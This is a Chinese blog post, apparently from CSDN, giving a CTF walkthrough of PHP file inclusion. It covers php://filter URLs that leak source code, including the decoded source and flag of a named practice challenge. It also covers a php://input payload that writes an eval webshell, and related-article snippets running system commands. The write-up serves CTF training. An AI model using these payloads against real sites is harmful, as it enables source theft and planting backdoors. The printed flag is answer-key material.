【CTF题】使用文件包含漏洞读取网页代码

最新推荐文章于 2024-03-10 23:56:48 发布
最新推荐文章于 2024-03-10 23:56:48 发布
阅读量2.1w 收藏 27
点赞数 6
分类专栏: 网络安全 文章标签: php 漏洞 ctf 文件包含
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/keysking/article/details/54728702
版权

【CTF题】使用文件包含漏洞读取网页代码

按照我的理解文件包含漏洞是指网页后端php(或其他)代码中使用了include等文件包含语句,而且所包含的文件由变量控制,恰恰此变量又能通过GET或POST等方式进行修改所造成的。

1.直接包含内有运行代码的文件

比如有一index.php

<?php
  include $_GET['file'];
?>

那么就可以通过抓包修改file值的办法去运行一些本来不该运行的文件

也可以通过此方法直接输出一些敏感的配置文件和远程包含shell(需要目标主机开启allow_url_fopen)

2.通过PHP内置协议直接读取代码

通过构造如下语句:

http://xxx.com/index.php?file=php://filter/read=convert.base64-encode/resource=xxx.php

就能获得xxx.php的代码的base64加密结果,通过base64解密后便可获得xxx.php的代码

题目是南邮网络攻防平台的文件包含题
这里写图片描述

点击“click me?no”以后:
这里写图片描述

可以看到,url变为了:

http://4.chinalover.sinaapp.com/web7/index.php?file=show.php

出现了?file=show.php

说明可能有文件包含漏洞,so,构建url如下:

http://4.chinalover.sinaapp.com/web7/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到了index.php的base64加密后的代码
这里写图片描述

base解密后得到代码:

<html>
    <title>asdf</title>

<?php
    error_reporting(0);
    if(!$_GET[file]){echo '<a href="./index.php?file=show.php">click me? no</a>';}
    $file=$_GET['file'];
    if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag:nctf{edulcni_elif_lacol_si_siht}

?>
</html>

可以看到,flag就在这里~

3.写入php文件

使用如下url:

http://xxx.com/index.php?file=php://input

并且在http头里提交

<?fputs(fopen("shell.php","w"),"<?php eval($_post['xxx'];?>")?>

就能在index.php说在的目录下生成shell.php

未完待续

keysking
关注
  • 6
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
你不知道的文件上传漏洞php代码分析
12-18
文件处理一般包含两项功能,用户上传和展示文件,如上传头像。 文件上传攻击示例 upload.php <?php $uploaddir = 'uploads/'; $uploadfile = $uploaddir . basename($_FILES['userfile']['name']); if (move_...
文件包含漏洞
pie002的博客
04-22 863
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少代码冗余,降低代码后期维护难度。保证网站整体风格统一。
反序列化漏洞
qq_41788704的博客
03-19 703
反序列化漏洞 反序列化漏洞我以前看过很多次了,可是一直都不能理解,今天有做了一个bugku的目,就好像突然开窍一样,所以就想记下来。 下面就是源码 <!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&&(file_ge...
ctfer的web日常:file_include(攻防世界)
最新发布
Hunter1_1的博客
03-10 349
【代码】ctfer的web日常:file_include(攻防世界)
shownews.php,ctfshow web入门 文件包含(持续更新)
weixin_34433661的博客
04-01 196
文章目录web78web79web80-81web82web78if(isset($_GET['file'])){$file = $_GET['file'];include($file);}else{highlight_file(__FILE__);}第一是最基础的文件包含,直接上payloadpayload:?file=php://filter/convert.base64-encode/re...
CTF攻防世界web》之我什么都不会(1)
m0_55400802的博客
10-20 1719
🍀作者简介:被吉师散养、喜欢前端、学过后端、练过CTF、玩过DOS、不喜欢java的不知名学生。被吉师散养的职业混子🫒文章目的:记录唯几我能做上的CTF专栏攻防世界入门都要看答案,我是废物。
ctf中怎样获取php文件源码,ctf中关于php伪协议的考查
weixin_33483567的博客
03-09 1316
原创: Archerx ...
ctfshow web(日志注入&简单回显盲注&&with rollup注入绕过)
weixin_63231007的博客
05-25 938
web3 <?php include($_GET['url']);?> php伪协议的标志。没有提示我们flag在哪个文件,filter试一下flag.php,flag,txt,flag都没有 用php://input试一下,burp抓包 发现了ctf_go_go_go,应该就是我们的flag文件。 post 传入 <?php system('cat ctf_go_go_go'); ?> cat一下,得到flag。 web4 include()函数包含的文件会被
CTF/CTF练习平台-welcome to bugkuctfphp://filter及php://input】
热门推荐
Sp4rkW的博客
09-01 3万+
内容: http://120.24.86.145:8006/test1/ 首先bp一下,可见提示源码: &lt;!-- $user = $_GET["txt"]; $file = $_GET["file"]; $pass = $_GET["password"]; if(isset($user)&amp;&amp;(file_get_contents($...
攻防世界 Web_php_include思路
xj28555的博客
07-07 4146
进入目 一串简短的PHP代码,这里对page这个参数用str_replace函数进行了过滤,str_replace函数的作用是匹配前面一段字符,匹配到的话就替换成后面一段,所以这里的代码意思就是,假如我们传入的page参数包含php://就会被替换成空字符。并且判断page里面文件是否存在,存在则包含文件。 当然这有多种解法,我这里就讲述三种。 第一种 绕过str_replace函数,对渗透测试有点了解的都知道str_replace这个函数及其不安全,可以利用大小写绕过,双写绕过等,这里我用
ctfCTF理论考核及答案
07-05
ctf
CTF理论考核及答案 ctf
02-21
CTF理论考核及答案 ctf库 1.readme.txt中哪一部分是扩展名 A、readme B、readme. C、.txt D、me.txt 参考答案:C 2.关于html语言,描述错误的有 A、html语言不区分大小写 B、浏览器可以直接解释执行html代码 C...
CTF库超详细资源合集
06-14
ctfCTF ⽬类型⼀般分为 Web 渗透、RE 逆向、Misc 杂项、PWN ⼆进制漏洞利⽤、Crypto 密码破译。 在传统的CTF线上⽐赛中,Web类...Web类⽬常见的漏洞类型包括注⼊、XSS、⽂件包含、代码执⾏、上传、SSRF等。
CTF100.docx
05-25
在攻防模式CTF赛制中,参赛队伍在网络空间互相进行攻击和防守,挖掘网络服务漏洞并攻击对手服务来得分,修补自身服务漏洞进行防御来避免丢分。攻防模式CTF赛制可以实时通过得分反映出比赛情况,最终也以得分直接分出...
领航杯 CTF 2021 决赛 真 7z
12-07
领航杯 CTF 2021 决赛
CTF-Dest0g3CTF2022招新赛
06-01
CTF-Dest0g3CTF2022招新赛,来自BUUCTF
web-渗透-文件上传漏洞靶场.rar
03-14
本靶场为二十一个关于文件上传漏洞的环境,从前端绕过、服务器绕过、木马图上传绕过、截断绕过、竞争条件等等几乎包含目前所有的文件上传漏洞类型,刷完即掌握文件上传漏洞的所有要点。 文件中打包了所需的所有环境...
文件上传漏洞常见绕过方法
05-26
1、前端js检测文件格式 2、上传的文件时加入了“Content-Type”验证 3、文件后缀验证 4、文件后缀黑名单 5、文件头验证 6、文件内容初级验证 7、文件上传+文件包含
2021 N1CTF CTF.zip
12-07
2021 N1CTF CTF
ctf比赛中,常见的文件包含漏洞的做法
08-24
文件包含漏洞主要出现在动态网页中,它指的是在文件中引用其他文件时,未经有效的过滤或验证,导致恶意用户可以通过构造特定的请求,获取系统中的敏感信息或执行任意代码。 首先,一个常见的做法是利用路径遍历来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值